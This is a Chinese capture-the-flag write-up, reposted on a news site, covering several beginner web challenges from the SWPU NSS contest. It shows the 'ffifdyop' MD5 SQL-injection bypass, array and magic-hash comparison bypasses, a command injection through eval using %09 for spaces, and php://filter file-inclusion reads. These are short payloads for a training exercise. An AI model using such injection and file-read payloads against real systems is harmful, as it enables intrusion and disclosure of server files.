1、奇妙的MD5 查看head,发现有md5绕过 这边有一个算是万能绕过的字符:ffifdyop,根据函数md5加密后,再次转换为字符串时,会变成’or’6,此时函数一定为真。(具体内容可以查一查md5($pass,true)函数) 输入
输入后跳转页面
数组绕过一下:/?x[]=1&y[]=2
还是数组绕过就可以:wqh[]=1&dsy[]=2
然后就出flag了
查到应该是在成都,锦江区的某个酒店吧,看一下图片的名字,我眼神不好,应该是古*酒店,百度搜索一下,应该是叫古迹酒店
构造一下:?web=0e215962017
这地方没找到什么,只有一个能点击,应该是大佬的博客,页面跳转,应该不是题目内容了,所以抓个包看看
18){ die("This is too long."); } else{ eval($get); } }else { die("nonono"); }} ?>
分析一下,两个部分:第一个是strstr()函数,与str_ireplace()函数配合使用吧
Get值正常输入,没有问题,不能带flag,因为带flag会替换成空格,就不能过掉strstr()函数,也不能存在空格。
构造一下:?get=system(ls);
构造语句:用%09能代替空格
看看根下,确实有flag
语句:?get=system('nl%09/f*');
最后出flag
首先,访问一下flag.php,
所以构造一下:
http://url/?file=php://filter/read=convert.base64-encode/resource=flag
这边跟上一次,伪协议类似,看看flag.php
这次说是在/flag处,用伪协议
http://url/?file=php://filter/read=convert.base64-encode/resource=/flag
来源地址:https://blog.csdn.net/weixin_46497491/article/details/127478337
--结束END--
本文标题: 【SWPU NSS新生赛校外通道】web:奇妙的MD5、whereami、webdog1__start、ez_ez_php、ez_ez_php(revenge)
本文链接: https://lsjlt.com/news/453935.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0